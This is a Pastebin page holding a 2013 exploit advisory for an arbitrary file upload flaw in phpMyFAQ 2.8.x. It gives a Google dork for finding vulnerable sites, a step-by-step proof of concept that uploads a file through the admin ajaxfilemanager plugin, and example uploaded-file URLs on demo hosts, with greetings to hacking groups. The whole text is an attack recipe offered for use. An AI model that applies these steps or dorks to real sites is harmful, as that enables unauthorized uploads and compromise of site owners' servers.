Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

phpMyFAQ 2.8.x Arbitrary File Upload Vulnerabillity

By: LiberoExploit on Nov 16th, 2013  |  syntax: None  |  size: 0.84 KB  |  views: 299  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. #Title : phpMyFAQ 2.8.x Arbitrary File Upload Vulnerabillity
  2.  
  3. #Author : DevilScreaM
  4.  
  5. #Date : 10/26/2013
  6.  
  7. #Category : Web Applications
  8.  
  9. #Type : PHP
  10.  
  11. #Vendor : http://phpmyfaq.de/
  12.  
  13. #Version : 2.8.x
  14.  
  15. #Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
  16.           Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
  17.  
  18. #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
  19.  
  20. #Vulnerabillity : Arbitrary File Upload
  21.  
  22. #Dork : intext:powered by phpMyFAQ
  23.  
  24.  
  25. Exploit & POC
  26.  
  27. 1. Login to Page Admin
  28.  
  29. Go to
  30.  
  31. http://site-target/admin/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
  32.  
  33. 2. Browse Your File, and Click Upload
  34.  
  35. Result Upload
  36.  
  37. http://site-target/images/[YOUR_FILE].txt
  38.  
  39.  
  40. Example :
  41.  
  42. http://jen.demo.phpmyfaq.de/images/devilscream.txt
  43. http://roy.demo.phpmyfaq.de/images/devilscream.txt